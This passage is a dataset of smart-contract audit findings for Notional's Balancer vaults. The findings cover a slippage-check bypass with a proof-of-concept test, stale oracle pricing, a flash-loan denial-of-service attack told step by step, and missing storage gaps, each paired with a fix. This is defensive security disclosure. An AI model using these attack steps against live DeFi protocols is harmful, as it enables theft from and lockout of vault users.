The `trade.limit` is the maximum amount of sellToken that can be sold OR the minimum amount of buyToken the contract is expected to receive from the DEX depending on whether you are performing a sell or buy.\\n```\\nFile: TradingModule.sol\\n function executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n ) external override returns (uint256 amountSold, uint256 amountBought) {\\n // This method calls back into the implementation via the proxy so that it has proper\\n // access to storage.\\n trade.limit = PROXY.getLimitAmount(\\n trade.tradeType,\\n trade.sellToken,\\n trade.buyToken,\\n trade.amount,\\n dynamicSlippageLimit\\n );\\n```\\n\\nWithin the `TradingUtils._getLimitAmount` function, when the `slippageLimit` is set to `0`,\\nIf it is a sell trade, the `limitAmount` will be set to `type(uint256).max`. See Line 187\\nIf it is a buy trade, the `limitAmount` will be set to `0`. See Line 207\\nThese effectively remove the slippage limit. Therefore, a malicious user can specify the `callbackData.oracleSlippagePercent` to be `0%` to bypass the slippage validation check.\\n```\\nFile: TradingUtils.sol\\n function _getLimitAmount(\\n TradeType tradeType,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n uint32 slippageLimit,\\n uint256 oraclePrice,\\n uint256 oracleDecimals\\n ) internal view returns (uint256 limitAmount) {\\n uint256 sellTokenDecimals = 10 **\\n (\\n sellToken == Deployments.ETH_ADDRESS\\n ? 18\\n : IERC20(sellToken).decimals()\\n );\\n uint256 buyTokenDecimals = 10 **\\n (\\n buyToken == Deployments.ETH_ADDRESS\\n ? 
18\\n : IERC20(buyToken).decimals()\\n );\\n\\n if (tradeType == TradeType.EXACT_OUT_SINGLE || tradeType == TradeType.EXACT_OUT_BATCH) {\\n // 0 means no slippage limit\\n if (slippageLimit == 0) {\\n return type(uint256).max;\\n }\\n // For exact out trades, we need to invert the oracle price (1 / oraclePrice)\\n // We increase the precision before we divide because oraclePrice is in\\n // oracle decimals\\n oraclePrice = (oracleDecimals * oracleDecimals) / oraclePrice;\\n // For exact out trades, limitAmount is the max amount of sellToken the DEX can\\n // pull from the contract\\n limitAmount =\\n ((oraclePrice + \\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) / \\n oracleDecimals;\\n\\n // limitAmount is in buyToken precision after the previous calculation,\\n // convert it to sellToken precision\\n limitAmount = (limitAmount * sellTokenDecimals) / buyTokenDecimals;\\n } else {\\n // 0 means no slippage limit\\n if (slippageLimit == 0) {\\n return 0;\\n }\\n // For exact in trades, limitAmount is the min amount of buyToken the contract\\n // expects from the DEX\\n limitAmount =\\n ((oraclePrice -\\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) /\\n oracleDecimals;\\n\\n // limitAmount is in sellToken precision after the previous calculation,\\n // convert it to buyToken precision\\n limitAmount = (limitAmount * buyTokenDecimals) / sellTokenDecimals;\\n }\\n }\\n```\\n\\nProof-of-Concept\\nThe following test case shows that when the slippage is set to 11% (11e6), the transaction will be reverted and fails the test. 
This is working as intended because the slippage (11%) exceeded the threshold (emergencySettlementSlippageLimitPercent = 10%).\\n```\\ndef test_emergency_single_maturity_success(StratBoostedPoolUSDCPrimary):\\n (env, vault) = StratBoostedPoolUSDCPrimary\\n primaryBorrowAmount = 5000e8\\n depositAmount = 10000e6\\n env.tokens[""USDC""].approve(env.notional, 2 ** 256 - 1, {""from"": env.whales[""USDC""]})\\n maturity = enterMaturity(env, vault, 2, 0, depositAmount, primaryBorrowAmount, env.whales[""USDC""])\\n strategyContext = vault.getStrategyContext()\\n settings = dict(strategyContext[""baseStrategy""][""vaultSettings""].dict())\\n settings[""maxBalancerPoolShare""] = 0\\n vault.setStrategyVaultSettings(\\n list(settings.values()), \\n {""from"": env.notional.owner()}\\n )\\n # minPrimary is calculated internally for boosted pools \\n redeemParams = get_redeem_params(0, 0, \\n get_dynamic_trade_params(\\n DEX_ID[""UNISWAP_V3""], TRADE_TYPE[""EXACT_IN_SINGLE""], 11e6, True, get_univ3_single_data(3000)\\n )\\n )\\n vault.settleVaultEmergency(maturity, redeemParams, {""from"": env.notional.owner()})\\n vaultState = env.notional.getVaultState(vault.address, maturity)\\n assert vaultState[""totalStrategyTokens""] == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/settlement/test_settlement_boosted_usdc.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts ===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 1 item \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/settlement/test_settlement_boosted_usdc.py F 
[100%]\\n\\n==================================================================================================== FAILURES =====================================================================================================\\n```\\n\\nThe following test case shows that when the slippage is set to 0, the transaction does not revert and passes the test. This is not working as intended because having no slippage (0) technically exceeded the threshold (emergencySettlementSlippageLimitPercent = 10%).\\n```\\ndef test_emergency_single_maturity_success(StratBoostedPoolUSDCPrimary):\\n (env, vault) = StratBoostedPoolUSDCPrimary\\n primaryBorrowAmount = 5000e8\\n depositAmount = 10000e6\\n env.tokens[""USDC""].approve(env.notional, 2 ** 256 - 1, {""from"": env.whales[""USDC""]})\\n maturity = enterMaturity(env, vault, 2, 0, depositAmount, primaryBorrowAmount, env.whales[""USDC""])\\n strategyContext = vault.getStrategyContext()\\n settings = dict(strategyContext[""baseStrategy""][""vaultSettings""].dict())\\n settings[""maxBalancerPoolShare""] = 0\\n vault.setStrategyVaultSettings(\\n list(settings.values()), \\n {""from"": env.notional.owner()}\\n )\\n # minPrimary is calculated internally for boosted pools \\n redeemParams = get_redeem_params(0, 0, \\n get_dynamic_trade_params(\\n DEX_ID[""UNISWAP_V3""], TRADE_TYPE[""EXACT_IN_SINGLE""], 0, True, get_univ3_single_data(3000)\\n )\\n )\\n vault.settleVaultEmergency(maturity, redeemParams, {""from"": env.notional.owner()})\\n vaultState = env.notional.getVaultState(vault.address, maturity)\\n assert vaultState[""totalStrategyTokens""] == 0\\n```\\n\\n```\\n❯ brownie test tests/balancer/settlement/test_settlement_boosted_usdc.py --network mainnet-fork\\nBrownie v1.18.1 - Python development framework for Ethereum\\n\\n=============================================================================================== test session starts 
===============================================================================================\\nplatform linux -- Python 3.8.10, pytest-6.2.5, py-1.11.0, pluggy-1.0.0\\nplugins: eth-brownie-1.18.1, hypothesis-6.27.3, forked-1.4.0, xdist-1.34.0, web3-5.27.0\\ncollected 1 item \\nAttached to local RPC client listening at '127.0.0.1:8545'// rest of code\\n\\ntests/balancer/settlement/test_settlement_boosted_usdc.py . [100%]\\n\\n========================================================================================== 1 passed, 1 warning in 4.31s ===========================================================================================\\n```\\n","Update the `SettlementUtils._decodeParamsAndValidate` function to revert if the slippage is set to zero.\\n```\\nFile: SettlementUtils.sol\\n /// @notice Validates that the slippage passed in by the caller\\n /// does not exceed the designated threshold.\\n /// @param slippageLimitPercent configured limit on the slippage from the oracle price allowed\\n /// @param data trade parameters passed into settlement\\n /// @return params abi decoded redemption parameters\\n function _decodeParamsAndValidate(\\n uint32 slippageLimitPercent,\\n bytes memory data\\n ) internal view returns (RedeemParams memory params) {\\n params = abi.decode(data, (RedeemParams));\\n DynamicTradeParams memory callbackData = abi.decode(\\n params.secondaryTradeParams, (DynamicTradeParams)\\n );\\n\\n// Remove the line below\\n if (callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n// Add the line below\\n if (callbackData.oracleSlippagePercent == 0 || callbackData.oracleSlippagePercent > slippageLimitPercent) {\\n revert Errors.SlippageTooHigh(callbackData.oracleSlippagePercent, slippageLimitPercent);\\n }\\n }\\n```\\n\\nAppendix I - Normal and Post Maturity Vault Settlement\\nThe `settlementSlippageLimitPercent` and `postMaturitySettlementSlippageLimitPercent` of the vault are set to 5% and 10% respectively per the environment file 
provided by Notional.\\n```\\nFile: BalancerEnvironment.py\\n ""settlementSlippageLimitPercent"": 5e6, # 5%\\n ""postMaturitySettlementSlippageLimitPercent"": 10e6, # 10%\\n```\\n\\nWhen a user calls the `settleVaultNormal` or `settleVaultPostMaturity` function, the vault will validate that the slippage (DynamicTradeParams.oracleSlippagePercent) defined by the caller is within the acceptable slippage range by calling `SettlementUtils._decodeParamsAndValidate` function.\\n```\\nFile: MetaStable2TokenAuraVault.sol\\n function settleVaultNormal(\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata data\\n ) external {\\n if (maturity <= block.timestamp) {\\n revert Errors.PostMaturitySettlement();\\n }\\n if (block.timestamp < maturity - SETTLEMENT_PERIOD_IN_SECONDS) {\\n revert Errors.NotInSettlementWindow();\\n }\\n MetaStable2TokenAuraStrategyContext memory context = _strategyContext();\\n SettlementUtils._validateCoolDown(\\n context.baseStrategy.vaultState.lastSettlementTimestamp,\\n context.baseStrategy.vaultSettings.settlementCoolDownInMinutes\\n );\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.settlementSlippageLimitPercent,\\n data\\n );\\n MetaStable2TokenAuraHelper.settleVault(\\n context, maturity, strategyTokensToRedeem, params\\n );\\n context.baseStrategy.vaultState.lastSettlementTimestamp = uint32(block.timestamp);\\n context.baseStrategy.vaultState.setStrategyVaultState();\\n }\\n\\n function settleVaultPostMaturity(\\n uint256 maturity,\\n uint256 strategyTokensToRedeem,\\n bytes calldata data\\n ) external onlyNotionalOwner {\\n if (block.timestamp < maturity) {\\n revert Errors.HasNotMatured();\\n }\\n MetaStable2TokenAuraStrategyContext memory context = _strategyContext();\\n SettlementUtils._validateCoolDown(\\n context.baseStrategy.vaultState.lastPostMaturitySettlementTimestamp,\\n context.baseStrategy.vaultSettings.postMaturitySettlementCoolDownInMinutes\\n 
);\\n RedeemParams memory params = SettlementUtils._decodeParamsAndValidate(\\n context.baseStrategy.vaultSettings.postMaturitySettlementSlippageLimitPercent,\\n data\\n );\\n MetaStable2TokenAuraHelper.settleVault(\\n context, maturity, strategyTokensToRedeem, params\\n );\\n context.baseStrategy.vaultState.lastPostMaturitySettlementTimestamp = uint32(block.timestamp); \\n context.baseStrategy.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nSince the same vulnerable `SettlementUtils._decodeParamsAndValidate` function is being used here, the `settleVaultNormal` and `settleVaultPostMaturity` functions are affected by this issue too.",Malicious users can trigger the permissionless `settleVaultEmergency` function and cause the trade to suffer huge slippage. This results in loss of assets for the vaults and their users.,"```\\nFile: BalancerEnvironment.py\\n ""postMaturitySettlementSlippageLimitPercent"": 10e6, # 10%\\n ""emergencySettlementSlippageLimitPercent"": 10e6, # 10%\\n```\\n" +Rely On Balancer Oracle Which Is Not Updated Frequently,medium,"The vault relies on Balancer Oracle which is not updated frequently.\\nNote: This issue affects the MetaStable2 balancer leverage vault\\nThe issue is that this pool only handled ~1.5 transactions per day based on the last 5 days' data. In terms of average, the price will only be updated once every 16 hours. There are also many days that there is only 1 transaction. The following shows the number of transactions for each day within the audit period.\\n5 Oct 2022 - 3 transactions\\n4 Oct 2022 - 1 transaction\\n3 Oct 2022 - 1 transaction\\n2 Oct 2022 - 2 transactions\\n1 Oct 2022 - 1 transaction\\nNote that the price will only be updated whenever a transaction (e.g. swap) within the Balancer pool is triggered. Due to the lack of updates, the price provided by Balancer Oracle will not reflect the true value of the assets. 
Considering the stETH/ETH Balancer pool, the price of the stETH or ETH provided will not reflect the true value in the market.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Gets the oracle price pair price between two tokens using a weighted\\n /// average between a chainlink oracle and the balancer TWAP oracle.\\n /// @param poolContext oracle context variables\\n /// @param oracleContext oracle context variables\\n /// @param tradingModule address of the trading module\\n /// @return oraclePairPrice oracle price for the pair in 18 decimals\\n function _getOraclePairPrice(\\n TwoTokenPoolContext memory poolContext,\\n OracleContext memory oracleContext, \\n ITradingModule tradingModule\\n ) internal view returns (uint256 oraclePairPrice) {\\n // NOTE: this balancer price is denominated in 18 decimal places\\n uint256 balancerWeightedPrice;\\n if (oracleContext.balancerOracleWeight > 0) {\\n uint256 balancerPrice = BalancerUtils._getTimeWeightedOraclePrice(\\n address(poolContext.basePool.pool),\\n IPriceOracle.Variable.PAIR_PRICE,\\n oracleContext.oracleWindowInSeconds\\n );\\n\\n if (poolContext.primaryIndex == 1) {\\n // If the primary index is the second token, we need to invert\\n // the balancer price.\\n balancerPrice = BalancerConstants.BALANCER_PRECISION_SQUARED / balancerPrice;\\n }\\n\\n balancerWeightedPrice = balancerPrice * oracleContext.balancerOracleWeight;\\n }\\n\\n uint256 chainlinkWeightedPrice;\\n if (oracleContext.balancerOracleWeight < BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION) {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n require(rate > 0);\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n\\n // No overflow in rate conversion, checked above\\n chainlinkWeightedPrice = uint256(rate) * \\n 
(BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION - oracleContext.balancerOracleWeight);\\n }\\n\\n oraclePairPrice = (balancerWeightedPrice + chainlinkWeightedPrice) / \\n BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION;\\n }\\n```\\n\\n```\\nFile: BalancerUtils.sol\\n function _getTimeWeightedOraclePrice(\\n address pool,\\n IPriceOracle.Variable variable,\\n uint256 secs\\n ) internal view returns (uint256) {\\n IPriceOracle.OracleAverageQuery[]\\n memory queries = new IPriceOracle.OracleAverageQuery[](1);\\n\\n queries[0].variable = variable;\\n queries[0].secs = secs;\\n queries[0].ago = 0; // now\\n\\n // Gets the balancer time weighted average price denominated in the first token\\n return IPriceOracle(pool).getTimeWeightedAverage(queries)[0];\\n }\\n```\\n","Although it is not possible to obtain a price pair that truly reflects the true value of an asset in the real world, the vault should attempt to minimize inaccuracy and slippage as much as possible. This can be done by choosing and using a more accurate Oracle that is updated more frequently instead of using the Balancer Oracle that is infrequently updated.\\nChainlink should be used as the primary Oracle for price pair. If a secondary Oracle is needed for a price pair, consider using Teller Oracle instead of Balancer Oracle. Some example of how Chainlink and Tellor works together in a live protocol can be found here\\nObtaining the time-weight average price of BTP LP token from Balancer Oracle is fine as the Balancer pool is the source of truth. However, getting the price of ETH or stETH from Balancer Oracle would not be a good option.\\nOn a side note, it was observed that the weightage of the price pair is Balancer Oracle - 60% and Chainlink - 40%. Thus, this theoretically will reduce the impact of inaccurate prices provided by Balancer Oracle by around half. 
However, the team should still consider using a better Oracle as almost all the functions within the vault depends on the accurate price of underlying assets to operate.\\nNote: For the stETH/ETH balancer leverage vault, the price pair is computed based on a weighted average of Balancer Oracle and Chainlink. Based on the test script, the weightage is Balancer Oracle - 60% and Chainlink - 40%.\\n```\\nFile: BalancerEnvironment.py\\n ""maxRewardTradeSlippageLimitPercent"": 5e6,\\n ""balancerOracleWeight"": 0.6e4, # 60%\\n ""settlementCoolDownInMinutes"": 60 * 6, # 6 hour settlement cooldown\\n```\\n","The price provided by the function will not reflect the true value of the assets. It might be overvalued or undervalued. The affected function is being used in almost all functions within the vault. For instance, this function is part of the critical `_convertStrategyToUnderlying` function that computes the value of the strategy token in terms of its underlying assets. As a result, it might cause the following:\\nVault Settlement - Vault settlement requires computing the underlying value of the strategy tokens. 
It involves dealing with a large number of assets, and thus even a slight slippage in the price will be significantly amplified.\\nDeleverage/Liquidation of Account - If the price provided does not reflect the true value, users whose debt ratio is close to the liquidation threshold might be pre-maturely deleveraged/liquidated since their total asset value might be undervalued.\\nBorrowing - If the price provided does not reflect the true value, it might be possible that the assets of some users might be overvalued, and thus they are able to over-borrow from the vault.","```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice Gets the oracle price pair price between two tokens using a weighted\\n /// average between a chainlink oracle and the balancer TWAP oracle.\\n /// @param poolContext oracle context variables\\n /// @param oracleContext oracle context variables\\n /// @param tradingModule address of the trading module\\n /// @return oraclePairPrice oracle price for the pair in 18 decimals\\n function _getOraclePairPrice(\\n TwoTokenPoolContext memory poolContext,\\n OracleContext memory oracleContext, \\n ITradingModule tradingModule\\n ) internal view returns (uint256 oraclePairPrice) {\\n // NOTE: this balancer price is denominated in 18 decimal places\\n uint256 balancerWeightedPrice;\\n if (oracleContext.balancerOracleWeight > 0) {\\n uint256 balancerPrice = BalancerUtils._getTimeWeightedOraclePrice(\\n address(poolContext.basePool.pool),\\n IPriceOracle.Variable.PAIR_PRICE,\\n oracleContext.oracleWindowInSeconds\\n );\\n\\n if (poolContext.primaryIndex == 1) {\\n // If the primary index is the second token, we need to invert\\n // the balancer price.\\n balancerPrice = BalancerConstants.BALANCER_PRECISION_SQUARED / balancerPrice;\\n }\\n\\n balancerWeightedPrice = balancerPrice * oracleContext.balancerOracleWeight;\\n }\\n\\n uint256 chainlinkWeightedPrice;\\n if (oracleContext.balancerOracleWeight < BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION) {\\n 
(int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n require(rate > 0);\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n\\n // No overflow in rate conversion, checked above\\n chainlinkWeightedPrice = uint256(rate) * \\n (BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION - oracleContext.balancerOracleWeight);\\n }\\n\\n oraclePairPrice = (balancerWeightedPrice + chainlinkWeightedPrice) / \\n BalancerConstants.BALANCER_ORACLE_WEIGHT_PRECISION;\\n }\\n```\\n" +Attackers Can DOS Balancer Vaults By Bypassing The BPT Threshold,medium,"Malicious users can lock up all the leverage vaults offered by Notional causing denial-of-service by bypassing the BPT threshold and subseqently trigger an emergency settlement against the vaults.\\nThe current BPT threshold is set to 20% of the total BTP supply based on the environment file provided during the audit.\\n```\\nFile: BalancerEnvironment.py\\n ""oracleWindowInSeconds"": 3600,\\n ""maxBalancerPoolShare"": 2e3, # 20%\\n ""settlementSlippageLimitPercent"": 5e6, # 5%\\n```\\n\\n```\\nFile: BalancerVaultStorage.sol\\n function _bptThreshold(StrategyVaultSettings memory strategyVaultSettings, uint256 totalBPTSupply) \\n internal pure returns (uint256) {\\n return (totalBPTSupply * strategyVaultSettings.maxBalancerPoolShare) / BalancerConstants.VAULT_PERCENT_BASIS;\\n }\\n```\\n\\nWhen the total number of BPT owned by the vault exceeds the BPT threshold, no one will be able to enter the vault as per the require check at Line 295-296 within the `TwoTokenPoolUtils._joinPoolAndStake` function.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _joinPoolAndStake(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 primaryAmount,\\n uint256 
secondaryAmount,\\n uint256 minBPT\\n ) internal returns (uint256 bptMinted) {\\n // prettier-ignore\\n PoolParams memory poolParams = poolContext._getPoolParams( \\n primaryAmount, \\n secondaryAmount,\\n true // isJoin\\n );\\n\\n bptMinted = BalancerUtils._joinPoolExactTokensIn({\\n context: poolContext.basePool,\\n params: poolParams,\\n minBPT: minBPT\\n });\\n\\n // Check BPT threshold to make sure our share of the pool is\\n // below maxBalancerPoolShare\\n uint256 bptThreshold = strategyContext.vaultSettings._bptThreshold(\\n poolContext.basePool.pool.totalSupply()\\n );\\n uint256 bptHeldAfterJoin = strategyContext.totalBPTHeld + bptMinted;\\n if (bptHeldAfterJoin > bptThreshold)\\n revert Errors.BalancerPoolShareTooHigh(bptHeldAfterJoin, bptThreshold);\\n\\n // Transfer token to Aura protocol for boosted staking\\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\\n }\\n```\\n\\nAnother key point that is critical for this issue is that when the total number of BPT owned by the vault exceeds the BPT threshold, an emergency settlement can be triggered against the vault and anyone can triggered it as it is permissionless. A major side-effect of an emergency settlement is that the vault will be locked up after the emergency settlement. No one is allowed to enter the vault and users are only allowed to exit from the vault by taking their proportional share of cash and strategy tokens. The reason is that after the emergency settlement, there will be some asset cash balance in the vault and this will cause no one to be able to enter the vault due to the require check at Line 218. 
This side-effect has been verified by reviewing the codebase and clarifying with the sponsors.\\n```\\nFile: VaultState.sol\\n function enterMaturity(\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n VaultConfig memory vaultConfig,\\n uint256 strategyTokenDeposit,\\n uint256 additionalUnderlyingExternal,\\n bytes calldata vaultData\\n ) internal returns (uint256 strategyTokensAdded) {\\n // If the vault state is holding asset cash this would mean that there is some sort of emergency de-risking\\n // event or the vault is in the process of settling debts. In both cases, we do not allow accounts to enter\\n // the vault.\\n require(vaultState.totalAssetCash == 0);\\n```\\n\\nIf an attacker could force an emergency settlement on a vault anytime, he would be able to perform a DOS on the vault since the vault will basically be locked up after it. The following demonstrates how this can be performed:\\nAssume that the total supply of BTP in the WETH/stETH Balancer Pool is 100,000 Therefore, the BPT threshold of the vault will be 20,000.\\nAssume that the total number of BPT held by the vault is 19,900.\\nNote that under normal circumstances, it is not possible for the users to exceed the BPT threshold because the transaction will revert if the `bptHeldAfterJoin > bptThreshold` after the user enters the vault.\\nNote that at this point, the emergency settlement CANNOT be triggered against the vault because the vault has not exceeded BPT threshold yet\\nBob (attacker) flash-loans a large amount of ETH from dydx where the fee is almost non-existence (1 Wei Only)\\nBob allocates a portion of his ETH to join the WETH/stETH Balancer Pool. This will cause the total supply of BPT to increase significantly to 200,000.\\nBob allocates a portion of his ETH to enter the vault and causes the total number of BPT held by the vault to increase by 150 from 19,900 to 20,050. 
This is allowed because the total supply of BPT has increased to 200,000, and thus the BPT threshold has increased to 40,000. Also, Bob does not leverage himself and does not borrow from Notional since the flash loan already provided him with access to a large number of funds, and thus he does not need to pay for any borrowing cost to minimize the cost of this attack.\\nAt this point, due to the inflow of 150 BPT to the Balancer Pool, the total supply of BPT increase from 200,000 to 200,150.\\nAfter entering the vault, Bob exits the WETH/stETH Balancer Pool entirely with all his 100,000 BPT position. This will cause the total supply of BPT to fall back to 100,150. Per my research, there is no exit fee when a Liquidity Provider exits a pool. Also, a Liquidity Provider only suffers a loss due to impermanent loss. However, since all these steps are executed within the same transaction, there is no impermanent loss because no one perform any token swap. Thus, there is no cost incurred by Bob for this step.\\nNote that at this point, the emergency settlement CAN be triggered against the vault because the vault has exceeded the BPT threshold. The total number of BPT held by the vault is 20,050, and the BPT threshold is 20,030 (=100,150 * 0.2).\\nAnyone can trigger the emergency settlement as it is permissionless. Bob triggered an emergency settlement against the vault, and 20 BPT will be sold off in the market so that the vault will not exceed the BPT threshold. It is important to ensure that the number of BPTs to be sold is kept as low as possible so that the total value of the vault will not be reduced by slippage during the trade. This is because Bob still owns the shares of the vault and he wants to get back as much of his original deposit as possible later. This value can be optimized further with Math.\\nAs mentioned earlier, after an emergency settlement, the vault will be locked up. 
No one is allowed to enter the vault and users are only allowed to exit from the vault by taking their proportional share of cash and strategy tokens.\\nBob proceeds to redeem all his shares from the vault. He will get back all of his deposits minus the 20 BPT slippage loss during the emergency settlement that is split proportionally among all vault shareholders which is insignificant. Note that the Notional's leverage vault does not impose any exit fee.\\nBob proceeds to repay back his loan and pay 1 wei as the fee to dydx.\\nThe cost of attack is 1 wei (flash-loan fee) + 20 BPT slippage loss during the emergency settlement that is split proportionally among all vault shareholders, which is insignificant. The slippage loss during emergency settlement can be minimized by causing the total number of BPT held by the vault to exceed the BPT threshold by the smallest possible value.\\nAll the above steps will be executed within a single block/transaction.","Short term, consider the following measures to mitigate the issue:\\nThe emergency settlement function is permissionless and can be called by anyone. It is recommended to implement access control to ensure that this function can only be triggered by Notional.\\nThere is no withdrawal fee. Also, there is no deposit fee as long as users did not borrow from Notional. Therefore, this attack is mostly profitable. It is recommended to impose a fee on the users of the vault even if the users did not borrow from Notional. All users should be charged a fee for the use of the vault. This will make the attack less likely to be profitable in most cases.\\nUsers can enter and exit the vault within the same transaction/block. This allows the attacker to leverage the flash-loan facility to reduce the cost of the attack to almost nothing. It is recommended to prevent users from entering and exiting the vault within the same transaction/block. 
If the user entered the vault in this block, he/she could only exit at the next block.\\nLong term, update the implementation of the vault so that the vault will not be locked up after an emergency settlement. After selling off the excess BPT, the vault should allow users to enter the vault as per normal.","Malicious users can lock up all the leverage vaults offered by Notional causing denial-of-service. This results in a loss of funds for the protocol as the vault is no longer generating profit for the protocol, and also a loss of funds for vault users as they cannot realize the profits because they are forced to exit the vault prematurely.\\nThe following are various reasons why someone would want to perform a DOS on Notional vaults:\\nDamage the reputation of Notional, and reduce users' trust in Notional\\nA competitor who is also offering a leverage vault attempts to bring down Notional\\nSomeone who shorted Notional's protocol token","```\\nFile: BalancerEnvironment.py\\n ""oracleWindowInSeconds"": 3600,\\n ""maxBalancerPoolShare"": 2e3, # 20%\\n ""settlementSlippageLimitPercent"": 5e6, # 5%\\n```\\n" +Corruptible Upgradability Pattern,medium,"Storage of Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults might be corrupted during an upgrade.\\nFollowing are the inheritance of the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\nNote: The contracts highlighted in Orange mean that there are no gap slots defined. 
The contracts highlighted in Green mean that gap slots have been defined\\nInheritance of the MetaStable2TokenAuraVault vault\\n```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n MetaStable2TokenAuraVault-->MetaStable2TokenVaultMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->TwoTokenPoolMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->BalancerOracleMixin:::nogap\\n TwoTokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase;\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n\\nInheritance of the Boosted3TokenAuraVault vault\\n```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n Boosted3TokenAuraVault-->Boosted3TokenPoolMixin:::nogap\\n Boosted3TokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n\\nThe Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults are meant to be upgradeable. 
However, it inherits contracts that are not upgrade-safe.\\nThe gap storage has been implemented on the `BaseStrategyVault` and `BalancerStrategyBase` contracts inherited by the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\n```\\nabstract contract BaseStrategyVault is Initializable, IStrategyVault {\\n using TokenUtils for IERC20;\\n using TradeHandler for Trade;\\n ..SNIP..\\n // Storage gap for future potential upgrades\\n uint256[45] private __gap;\\n}\\n```\\n\\n```\\nabstract contract BalancerStrategyBase is BaseStrategyVault, UUPSUpgradeable {\\n /** Immutables */\\n uint32 internal immutable SETTLEMENT_PERIOD_IN_SECONDS;\\n ..SNIP..\\n // Storage gap for future potential upgrades\\n uint256[100] private __gap;\\n}\\n```\\n\\nHowever, no gap storage is implemented on the `Boosted3TokenPoolMixin`, `MetaStable2TokenVaultMixin`, `TwoTokenPoolMixin`, `PoolMixin`, `AuraStakingMixin` and `BalancerOracleMixin` contracts inherited by the Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults.\\nThus, adding new storage variables to any of these inherited contracts can potentially overwrite the beginning of the storage layout of the child contract. 
causing critical misbehaviors in the system.",Consider defining an appropriate storage gap in each upgradeable parent contract at the end of all the storage variable definitions as follows:\\n```\\nuint256[50] __gap; // gap to reserve storage in the contract for future variable additions\\n```\\n\\nReference\\nA similar issue was found in the past audit report:,"Storage of Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults might be corrupted during upgrading, thus causing the vaults to be broken and assets to be stuck.",```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n MetaStable2TokenAuraVault-->MetaStable2TokenVaultMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->TwoTokenPoolMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->BalancerOracleMixin:::nogap\\n TwoTokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase;\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n +Did Not Approve To Zero First,medium,"Allowance was not set to zero first before changing the allowance.\\nSome ERC20 tokens (like USDT) do not work when changing the allowance from an existing non-zero allowance value. 
